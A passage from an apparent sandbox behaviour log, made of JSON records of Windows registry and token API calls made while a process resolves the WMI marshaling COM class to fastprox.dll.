"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\(Default)" } ], "repeated": 0, "id": 829 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000376" }, { "name": "ValueName", "value": "" }, { "name": "Data", "value": "Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\(Default)" } ], "repeated": 0, "id": 830 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000376" }, { "name": "SubKey", "value": "InprocServer32" }, { "name": "Handle", "value": "0x0000037a" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32" } ], "repeated": 0, "id": 831 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000037a" }, { "name": "ValueName", "value": "InprocServer32" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\InprocServer32" } ], "repeated": 0, "id": 832 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000037a" }, { "name": "ValueName", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\(Default)" } ], "repeated": 0, "id": 833 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000037a" }, { "name": "ValueName", "value": "" }, { "name": "Data", "value": "%systemroot%\\system32\\wbem\\fastprox.dll" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\(Default)" } ], "repeated": 1, "id": 834 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000037a" }, { "name": "ValueName", "value": "ThreadingModel" }, { "name": "Data", "value": "Both" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\ThreadingModel" } ], "repeated": 0, "id": 835 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000037a" } ], "repeated": 0, "id": 836 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000376" }, { "name": "KeyInformation", "value": "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}" }, { "name": "KeyInformationClass", "value": "3" } ], "repeated": 0, "id": 837 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000376" }, { "name": "KeyInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "KeyInformationClass", "value": "7" } ], "repeated": 0, "id": 838 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": " n\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfe\\x7f\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\x087\\x8c\\xb7\\xfe\\x7f\\x00\\x00v\\x03\\x00\\x00\\x00\\x00\\x00\\x000:\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00 o\\x7f\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 839 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002_Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocHandler32" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocHandler32" } ], "repeated": 0, "id": 840 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000376" }, { "name": "KeyInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "KeyInformationClass", "value": "7" } ], "repeated": 0, "id": 841 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000376" }, { "name": "ObjectAttributesName", "value": "InprocHandler32" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocHandler32" } ], "repeated": 0, "id": 842 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000376" }, { "name": "KeyInformation", "value": "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}" }, { "name": "KeyInformationClass", "value": "3" } ], "repeated": 0, "id": 843 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000376" }, { "name": "KeyInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "KeyInformationClass", "value": "7" } ], "repeated": 0, "id": 844 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": " n\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfe\\x7f\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\x087\\x8c\\xb7\\xfe\\x7f\\x00\\x00v\\x03\\x00\\x00\\x00\\x00\\x00\\x000:\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00 o\\x7f\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 845 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002_Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocHandler" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocHandler" } ], "repeated": 0, "id": 846 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000376" }, { "name": "KeyInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "KeyInformationClass", "value": "7" } ], "repeated": 0, "id": 847 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000376" }, { "name": "ObjectAttributesName", "value": "InprocHandler" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocHandler" } ], "repeated": 0, "id": 848 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000376" } ], "repeated": 0, "id": 849 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 850 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002d8" }, { "name": "Milliseconds", "value": "0" } ], "repeated": 0, "id": 851 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x000002c6" }, { "name": "SubKey", "value": "CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}" }, { "name": "Handle", "value": "0x00000376" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}" } ], "repeated": 0, "id": 852 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000376" }, { "name": "KeyInformation", "value": "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}" }, { "name": "KeyInformationClass", "value": "3" } ], "repeated": 0, "id": 853 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000376" }, { "name": "KeyInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "KeyInformationClass", "value": "7" } ], "repeated": 0, "id": 854 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "Pl\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfe\\x7f\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\x087\\x8c\\xb7\\xfe\\x7f\\x00\\x00v\\x03\\x00\\x00\\x00\\x00\\x00\\x000:\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00Pm\\x7f\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 855 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002_Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\TreatAs" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\TreatAs" } ], "repeated": 0, "id": 856 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000376" }, { "name": "KeyInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "KeyInformationClass", "value": "7" } ], "repeated": 0, "id": 857 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000376" }, { "name": "ObjectAttributesName", "value": "TreatAs" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\TreatAs" } ], "repeated": 0, "id": 858 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000376" }, { "name": "KeyInformation", "value": "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}" }, { "name": "KeyInformationClass", "value": "3" } ], "repeated": 0, "id": 859 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000376" }, { "name": "ValueName", "value": "ActivateOnHostFlags" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\ActivateOnHostFlags" } ], "repeated": 0, "id": 860 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000376" }, { "name": "ValueName", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\(Default)" } ], "repeated": 0, "id": 861 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000376" }, { "name": "ValueName", "value": "" }, { "name": "Data", "value": "Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\(Default)" } ], "repeated": 0, "id": 862 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000376" }, { "name": "SubKey", "value": "InprocServer32" }, { "name": "Handle", "value": "0x0000037a" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32" } ], "repeated": 0, "id": 863 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000037a" }, { "name": "ValueName", "value": "InprocServer32" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\InprocServer32" } ], "repeated": 0, "id": 864 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000037a" }, { "name": "ValueName", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\(Default)" } ], "repeated": 0, "id": 865 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000037a" }, { "name": "ValueName", "value": "" }, { "name": "Data", "value": "%systemroot%\\system32\\wbem\\fastprox.dll" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\(Default)" } ], "repeated": 1, "id": 866 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000037a" }, { "name": "ValueName", "value": "ThreadingModel" }, { "name": "Data", "value": "Both" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\ThreadingModel" } ], "repeated": 0, "id": 867 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000037a" } ], "repeated": 0, "id": 868 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000376" }, { "name": "KeyInformation", "value": "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}" }, { "name": "KeyInformationClass", "value": "3" } ], "repeated": 0, "id": 869 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000376" }, { "name": "KeyInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "KeyInformationClass", "value": "7" } ], "repeated": 0, "id": 870 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\xe0j\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfe\\x7f\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\x087\\x8c\\xb7\\xfe\\x7f\\x00\\x00v\\x03\\x00\\x00\\x00\\x00\\x00\\x000:\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xe0k\\x7f\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 871 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002_Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocHandler32" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocHandler32" } ], "repeated": 0, "id": 872 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000376" }, { "name": "KeyInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "KeyInformationClass", "value": "7" } ], "repeated": 0, "id": 873 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000376" }, { "name": "ObjectAttributesName", "value": "InprocHandler32" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocHandler32" } ], "repeated": 0, "id": 874 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000376" }, { "name": "KeyInformation", "value": "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}" }, { "name": "KeyInformationClass", "value": "3" } ], "repeated": 0, "id": 875 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000376" }, { "name": "KeyInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "KeyInformationClass", "value": "7" } ], "repeated": 0, "id": 876 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\xe0j\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfe\\x7f\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\x087\\x8c\\xb7\\xfe\\x7f\\x00\\x00v\\x03\\x00\\x00\\x00\\x00\\x00\\x000:\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xe0k\\x7f\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 877 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002_Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocHandler" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocHandler" } ], "repeated": 0, "id": 878 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000376" }, { "name": "KeyInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "KeyInformationClass", "value": "7" } ], "repeated": 0, "id": 879 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": 